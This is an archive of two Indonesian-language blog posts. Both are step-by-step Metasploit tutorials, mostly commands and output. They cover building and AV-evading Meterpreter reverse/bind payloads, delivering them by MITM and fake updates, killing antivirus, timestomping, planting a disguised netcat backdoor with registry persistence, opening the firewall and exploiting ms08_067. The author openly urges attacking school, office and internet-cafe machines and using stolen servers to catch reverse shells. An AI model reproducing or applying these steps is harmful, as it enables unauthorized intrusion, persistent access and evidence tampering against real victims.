Archive for the ‘Meterpreter’ tag
.fun and profit with meterpreter.
.so lets make ur choice kiddo,dengan mengacu sebelumnya pada artikel.
.meterpreter non encode.
neo@b0x:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 X > meterpreter_1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LHOST=192.168.0.12,LPORT=455
http://www.virustotal.com/analisis/4b0a655b264b23b2f4dab74688c8890e
Result: 1/39
.meterpreter with encode XOR.
neo@b0x:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 R | ./msfencode -e x86/shikata_ga_nai -b '' -t exe -o meterpreter_2.exe
[*] x86/shikata_ga_nai succeeded, final size 306
http://www.virustotal.com/analisis/cbb1cf1a7ce9943c5d8d15f210da8361
Result: 0/39 (0%)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.12
LHOST => 192.168.0.12
msf exploit(handler) > set LPORT 455
LPORT => 455
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
.next move is critical,well sekarang attacker membuat target agar mengeksekusi meterpreter_2.exe sebeneranya ini tergantung imajinasi anda sendiri.
.penulis sendiri memilih ettercap sebagai jembatan menggunakan metode MITM. bisa dengan ettercap filter yang akan membuat popup setiap target melakukan browsing.
.ataupun dengan kombinasi evilgrade( www.infobyte.com.ar )+ettercap dengan DNS spoofing secara tidak langsung akan mengelabui target untuk melakukan fake patch
untuk beberapa program yang ada di evilgrade exam: winamp,winzip,notepad++ bisa juga menambahkan modul tersendiri di evilgrade; firefox ataupun thunderbird (-.-)”.
.setelah target mengeksekusi meterperter_2.exe.
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.12:455 -> 192.168.0.5:1037)
meterpreter > sysinfo
Computer: PENTEST3
OS : Windows XP (Build 2600, Service Pack 3).
.with remote desktop.
.there is for Virtual Network Computing look, im prefer CLI than GUI (^^)V.
meterpreter > run getgui
-----------------passing------------------------
.kill AV.
meterpreter > run killav
[*] Killing Antivirus services on the target...
.ok bisa juga dengan mengedit killav.rb untuk menambahkan beberapa list AV tersendiri.
neo@b0x:~# vi /pentest/exploits/framework3/scripts/meterpreter/killav.rb
#
# Meterpreter script that kills all Antivirus processes
# Provided by: Jerome Athias
#
print_status("Killing Antivirus services on the target...")
avs = %W{
AAWTray.exe
Ad-Aware.exe
MSASCui.exe
_avp32.exe
_avpcc.exe
_avpm.exe
aAvgApi.exe
ackwin32.exe
adaware.exe
advxdwin.exe
agentsvr.exe
agentw.exe
alertsvc.exe
alevir.exe
alogserv.exe
amon9x.exe
anti-trojan.exe
-----------------cut------------------------
windows enumiration
meterpreter > run winemun
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.0.5:1037...
[*] Saving report to /neo/.msf3/logs/winenum/192.168.0.5_20090216.174854613/192.168.0.5_20090216.174854613.txt
[*] Checking if PENTEST3 is a Virtual Machine ........
[*] This is a VMWare virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -nao
[*] running command netstat -vb
[*] running command netstat -ns
[*] running command net accounts
[*] running command net accounts /domain
[*] running command net session
-----------------cut------------------------
example output winenum
neo@b0x:~# cat /neo/.msf3/logs/winenum/192.168.0.5_20090216.174854613/192.168.0.5_20090216.174854613.txt
Date: 2009-02-16.02:17:48
Running as: PENTEST3\pentest3
Host: PENTEST3
OS: Windows XP (Build 2600, Service Pack 3).
This is a VMWare virtual Machine
*****************************************
Output of cmd.exe /c set
*****************************************
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\pentest3\Application Data
CLIENTNAME=Console
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=PENTEST3
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\pentest3
LOGONSERVER=\\PENTEST3
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 13, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0f0d
ProgramFiles=C:\Program Files
PROMPT=$P$G
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\pentest3\LOCALS~1\Temp
TMP=C:\DOCUME~1\pentest3\LOCALS~1\Temp
USERDOMAIN=PENTEST3
-----------------cut------------------------
.bagaimana bila winemun ruby dalam framework3/scripts/meterpreter/winenum.rb.
.penulis lakukan modifikasi hingga yang di dump adalah my document bukan lagi registry ^_^V.
.netcat as backdoor.
.swiss army knife menggunakan TCP dan UDP dalam melakukan koneksi,penulis akan membahas penggunaan backd00r dalam wind#ws b0x.
.walaupun banyak antivirus menggangap netcat sebagai hacktool
meterpreter > use priv
Loading extension priv...success.
meterpreter > upload /tmp/system32.exe C:\\windows\\system32\\
[*] uploading : /tmp/system32.exe -> C:\windows\system32\
[*] uploaded : /tmp/system32.exe -> C:\windows\system32\\system32.exe
.change file times.
meterpreter > timestomp C:\\windows\\system32\\system32.exe -v
Modified : Tue Feb 24 20:27:49 -0500 2009
Accessed : Thu Feb 26 09:29:39 -0500 2009
Created : Tue Feb 24 20:27:49 -0500 2009
Entry Modified: Thu Feb 26 09:29:39 -0500 2009
meterpreter > timestomp C:\\windows\\system32\\system32.exe -b
[*] Blanking file MACE attributes on C:\windows\system32\system32.exe
meterpreter > timestomp C:\\windows\\system32\\system32.exe -f C:\\windows\\system32\\cmd.exe
[*] Setting MACE attributes on C:\windows\system32\system32.exe from C:\windows\system32\cmd.exe
meterpreter > timestomp C:\\windows\\system32\\system32.exe -v
Modified : Sun Apr 13 18:42:16 -0400 2008
Accessed : Sat Feb 28 05:06:19 -0500 2009
Created : Thu Aug 23 08:00:00 -0400 2001
Entry Modified: Sat Feb 28 05:06:19 -0500 2009
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (3):
SunJavaUpdateSched
VMware Tools
VMware User Process
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
Successful set system32.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: system32
Type: REG_SZ
Data: C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe
.bypass XP default firewall.
.ada 2 metode dalam baypass firewall dari XP,dengan registry ataupun dengan network shell.
.with registry edit.
meterpreter > reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
Enumerating: HKLM\system\controlset001services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list
No children.
meterpreter > reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32 -d "C:\WINDOWS\system32\system32.exe:*:Enabled:system32"
Successful set system32.
meterpreter > reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
Key: HKLM\system\controlset001services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list
Name: system32
Type: REG_SZ
Data: C:WINDOWSsystem32system32.exe:*:Enabled:system32
.with “netsh” command.
C:\Documents and Settings\pentest3\Desktop>Netsh firewall show opmode
Netsh firewall show opmode
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable <<<< this
Exception mode = Enable <<<< this
Local Area Connection 2 firewall configuration:
-------------------------------------------------------------------
Operational mode = Enable
.setting firewall menarik disana adalah operation dan exception mode yang enable.
.sehingga attacker dapat melakukan penambahan port yang terbuka.
C:\Documents and Settings\pentest3\Desktop>netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
ok.
C:\Documents and Settings\pentest3\Desktop>netsh firewall show portopening
netsh firewall show portopening
Port configuration for Domain profile:
Port Protocol Mode Name
-------------------------------------------------------------------
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
455 TCP Enable Service Firewall <<<< this
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
.change target XP desktop wallpaper.
.secata default XP menamakan wallpaper desktopnya dengan wallpaper1.bmp, sehingga kita dapat melakukan replace.
.is this funny?.
meterpreter > upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
[*] uploading : /neo/wallpaper1.bmp -> C:\documents and settings\pentest3\local settings\application data\microsoft\
[*] uploaded : /neo/wallpaper1.bmp -> C:\documents and settings\pentest3\local settings\application data\microsoft\\wallpaper1.bmp
meterpreter > execute -H -i -f cmd.exe
Process 1096 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\pentest3\Desktop>
.one more funny stuff.
.dengan shutdown command attacker dapat melakukan shutdown/restart dengan timeout,with funny message.
C:\Documents and Settings\pentest3\Desktop>shutdown -r -f -c "::your box are belong to us::" -t 13
shutdown -r -f -c "::your box are belong to us::" -t 13
msf > connect 192.168.0.5 455
[*] Connected to 192.168.0.5:455
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\pentest3>
are u makes fun kidd0?
upgrade ur evil mind and imagination,explore out of the sphere,think out of the box
make ur choice;
EOF--
Metasploit: Backdooring
Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.
Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.
$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread
Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut:
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)
meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.
Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)
meterpreter >
Metode kedua menggunakan reverse shell, reverse shell digunakan terutama apabila network target dibatasi oleh firewall sehingga tidak bisa membuka koneksi ke semua port (tipikal internal network). Jadi jika kalian mendapatkan kesempatan untuk hacking ke salah satu mesin dalam internal network (misal: komputer sekolah, komputer kantor, komputer warnet, etc) serta tetap ingin mendapatkan akses shell tersebut kapanpun dan dimanapun bisa memanfaatkan multi-handler metasploit untuk menerima reverse shell. Kita bisa setup multi-handler di mesin-mesin yang dapat diakses dari manapun di internet, misalnya: mesin hosting, atau mesin server hasil rampokan, dsb.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
Selanjutnya tinggal buat backdoor dengan kategori reverse_shell:
$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
Dan ketika dijalankan (dijalankan melalui sesi pasca exploitasi ataupun dijalankan secara manual lewat double-click mouse 
), pada multi-handler akan muncul:
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)
meterpreter >
Asyiknya menggunakan multi-handler metasploit adalah kita dapat memiliki banyak sessions sekaligus, untuk contoh diatas dapat dilihat satu multi-handler yang telah diset ExitOnSession==false dapat menghandle banyak reverse_shell sekaligus. Dan kita dapat berinteraksi dengan session-session tersebut kapanpun kita mau:
msf exploit(handler) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
3 Meterpreter 222.124.199.76:53 -> 10.10.96.146:4831
4 Meterpreter 222.124.199.76:53 -> 10.10.96.223:4836
5 Meterpreter 222.124.199.76:53 -> 10.10.96.215:4838
6 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4840
7 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4845
8 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4846
9 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4847
msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS : Windows XP (Build 2600, ).
Itulah beberapa contoh pemanfaatan metasploit untuk backdooring, masih banyak contoh-contoh kreatif lainnya terutama yang berbau kiddies dan evil-in-mind. Oh iya, pada contoh diatas saya menggunakan payload meterpreter berkali-kali. Pembahasan tentang meterpreter akan dilakukan berikutnya.
Stay tuned *heh, serasa pembawa acara opera sabun*